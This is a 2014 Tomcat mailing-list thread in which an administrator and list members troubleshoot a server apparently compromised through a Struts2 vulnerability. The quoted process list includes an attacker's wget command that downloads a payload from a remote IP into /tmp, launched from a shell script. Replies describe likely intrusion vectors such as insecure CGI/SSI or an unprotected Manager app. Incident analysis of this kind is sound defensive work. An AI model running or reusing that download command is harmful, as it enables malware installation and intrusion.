Hello Martin/Felix, Im uploading mi logfiles so it will be available when finished uploading.
Regarding the configuration, its working in two other sites without problem, and there is no problem putting L4 balancing with haproxy. I have asked developers about that exploit, still without answer. I will let you know how things are going, thanks for all =) Regards/Saludos! BTW: Martin, thanks for your spanish words !!!! Really appreciate =) Saludos.- Leonardo Santagostini <http://ar.linkedin.com/in/santagostini> 2014-04-30 13:20 GMT-03:00 Felix Schumacher < felix.schumac...@internetallee.de>: > > > On 30. April 2014 17:35:52 MESZ, Leonardo Santagostini < > lsantagost...@gmail.com> wrote: > >Hello list, > > > >well my homework is done > > > >Here are the links: > > > >setenv.sh: http://pastebin.com/EN1mXDFi > >catalina.sh: http://pastebin.com/1vRVLbSm > >web.xml: http://pastebin.com/BqEfiXXm > >server.xml: http://pastebin.com/wfzE8bYU > >logging.properties: http://pastebin.com/Qurk8sLU > >catalina.properties: http://pastebin.com/jkfY1ZRQ > >tree + logsfiles: http://pastebin.com/j3tip4ij > > From the logfiles it looks like you have struts2 applications. It might be > that you are hit by a security problem within struts2 ( Konstantin > forwarded a warning a few days ago > http://tomcat.10.x6.nabble.com/Fwd-ANN-Struts-2-up-to-2-3-16-1-Zero-Day-Exploit-Mitigation-security-critical-td5016578.html). > > > > >Note that logsfiles, are not the logfiles itsef but only a ls -lah > >(just > >for you to see the logsizes) > > > >A little more about the infraestructure i've mounted ill do some ascii > >art. > > > > > >internet ---> FW -->nat-->Haproxy (1)-->Apache(2)--> mod_jk > >(3)-->Haproxy(4)--> Tomcat7(5) --> haproxy(6) --Tomcat(7) > > That seems a bit too complex. In my eyes you need no haproxy between httpd > and tomcat when you use mod_jk. > > Regards > Felix > > > > > >Apache(2) is serving static content so haproxy(1) at the first level > >does > >http round robin balancing > >Apache(2) connects to tomcat(5) through haproxy(4) (using L4 > >connection) > >using mod_jk(3) > >Tomcat(5) are the main app server (the ones gets intruded) who uses > >tomcat(7) (solr service) using haproxy(6) using L4 connection. > > > >Versions: > > > >Apache: 2.2.17 > >mod_jk: 1.2.31 > >haproxy: 1.4.22 > >Tomcat: 7.0.53 > >Java: 1.6.0.41 > > > >[root@arcbaappvrt05 tomcat]# /usr/java/default/bin/java -version > >java version "1.6.0_41" > >Java(TM) SE Runtime Environment (build 1.6.0_41-b02) > >Java HotSpot(TM) 64-Bit Server VM (build 20.14-b01, mixed mode) > > > >OS: CentOS 5.8 64 bit > > > >[root@arcbaappvrt05 tomcat]# uname -a > >Linux arcbaappvrt05.tic.yellargentina.com 2.6.18-308.el5 #1 SMP Tue Feb > >21 > >20:06:06 EST 2012 x86_64 x86_64 x86_64 GNU/Linux > >[root@arcbaappvrt05 tomcat]# cat /etc/redhat-release > >CentOS release 5.8 (Final) > >[root@arcbaappvrt05 tomcat]# > > > >For now i havent see that the squid process whas launched so i couldnt > >do a > >dump > > > >Letme know if you need more information. > > > >BTW, pastebin links will work for one week. > > > >Kind regards, yours > > > > > > > > > >Saludos.- > >Leonardo Santagostini > > > ><http://ar.linkedin.com/in/santagostini> > > > > > > > > > > > >2014-04-30 11:09 GMT-03:00 Leonardo Santagostini > ><lsantagost...@gmail.com>: > > > >> Ok, i will do the following: > >> > >> 1) thread dump of running tomcat instance > >> 2) Pastebin the running tomcat config > >> > >> I think at mid day will have all the info. > >> > >> Thanks all for replying me and all the responses. > >> > >> Regards, Leonardo > >> > >> Saludos.- > >> Leonardo Santagostini > >> > >> <http://ar.linkedin.com/in/santagostini> > >> > >> > >> > >> > >> > >> 2014-04-30 10:55 GMT-03:00 Christopher Schultz < > >> ch...@christopherschultz.net>: > >> > >> -----BEGIN PGP SIGNED MESSAGE----- > >>> Hash: SHA256 > >>> > >>> Konstantin, > >>> > >>> On 4/29/14, 4:54 PM, Konstantin Kolinko wrote: > >>> > 2014-04-30 0:41 GMT+04:00 Leonardo Santagostini > >>> > <lsantagost...@gmail.com>: > >>> >> Hello Dan, > >>> >> > >>> >> Nop, the attacker is executing locally the following > >>> >> > >>> >> tomcat 8882 1 0 Apr27 ? 00:00:00 sh /tmp/4.sh > >>> >> tomcat 8893 8882 0 Apr27 ? 00:00:00 wget > >>> >> http://218.199.102.59/.xy/squid32 -O /tmp/squid > >>> >> > >>> >> And the launch squid who tries to connect via ssh to varoius > >>> >> places. > >>> >> > >>> >> Right now its time to leave the office, but in a few hours i will > >>> >> paste in pastebin access logs, config files, wherever you tell > >>> >> me. > >>> >> > >>> >> This is my pstree > >>> >> > >>> >> [root@arcbaappvrt05 apache-tomcat-7.0.53]# pstree init─┬─atd > >>> >> ├─java─┬─sh───wget │ └─263*[{java}] > >>> > > >>> > sh launched by tomcat's java? > >>> > >>> Yes: please verify that it's the JVM running Tomcat, and not just > >any > >>> JVM process. > >>> > >>> > Take a thread dump: > >>> > > >>> > > > https://wiki.apache.org/tomcat/HowTo#How_do_I_obtain_a_thread_dump_of_my_running_webapp_.3F > >>> > > >>> > It shall show what is stacktrace in thread that launched external > >>> > process. > >>> > >>> +1 > >>> > >>> The only things that ship with Tomcat that call Process.exec() are > >the > >>> CGI servlet and SSI, both of which are disabled by default. So, > >either > >>> you have an insecure CGI/SSI configuration, your web application has > >a > >>> vulnerability, or you have deployed something like the Manager > >>> application and improperly-secured it. > >>> > >>> A classic example of such an intrusion might be that someone got a > >>> foothold elsewhere into your network, and the Manager web > >application > >>> is not properly secured with a password, etc. > >>> > >>> - -chris > >>> -----BEGIN PGP SIGNATURE----- > >>> Version: GnuPG v1 > >>> Comment: GPGTools - http://gpgtools.org > >>> Comment: Using GnuPG with Thunderbird - http://www.enigmail.net/ > >>> > >>> iQIcBAEBCAAGBQJTYQDeAAoJEBzwKT+lPKRYaPoQAKpqrj5bWfGXpEEHMINjw1Qp > >>> +qqdL7O61QLmWoA1neUbyM7A2s8mY3lRdcZwDw2IG33xoeLuFaavhFlDGr2Txer4 > >>> HiGDR8ixOv2mY9J9bMC889hih4N5dz0fYlw/b5SouUVz2aCbeUhYK+6lsBXRy2fC > >>> D+UoNOiQF6uX2ZlqJYZTAvgzC2t/SGGnTW3GLx+3buRxs4JlUjJ8RWEOZtjZLQ5o > >>> gUZ+UF6K/7dewYr6TjDmwc1C226dJNaliymQu2qbVgpRvoJ+baRgpeoyt6hzhIxr > >>> BA8gjKY5xOH6QrpSX2tdU8RNCRVLIgSmbp9Mj+Hovdw4kkDMLQvS3osuGq5HaEwS > >>> ZMltWiTef+K2yZyO3L8xrsJaRbox1j8Pg38ea22GRE48kpNagoQdCM2+uMCVN8Yj > >>> UFjUrcpMu0FX06dy8azbFDRZMv5lD8nmwgE624nT+gZfFaxGHNLa9dRpJWHZgvTb > >>> TSESKHv2lq9F4qc7bxoVrRDa8hnNLHk2luU9qot5JWXnb5en0fFKMZopwXwXYA4W > >>> WgGA0Cfy4gALkA4/CCqrsn6Z+EqIxXNdCn74CeeCh5fV28+0Zpuj7G1adtJUkCQ7 > >>> 87Cq6kXwHx4hfp//6vQhnZIGWYeKDOIgqbKuaP27pIcE1QCag5MOlmVT4pQjpT12 > >>> lvJcfOhzHLwo07Pv+y3J > >>> =EiX9 > >>> -----END PGP SIGNATURE----- > >>> > >>> > >--------------------------------------------------------------------- > >>> To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org > >>> For additional commands, e-mail: users-h...@tomcat.apache.org > >>> > >>> > >> > > > --------------------------------------------------------------------- > To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org > For additional commands, e-mail: users-h...@tomcat.apache.org > >
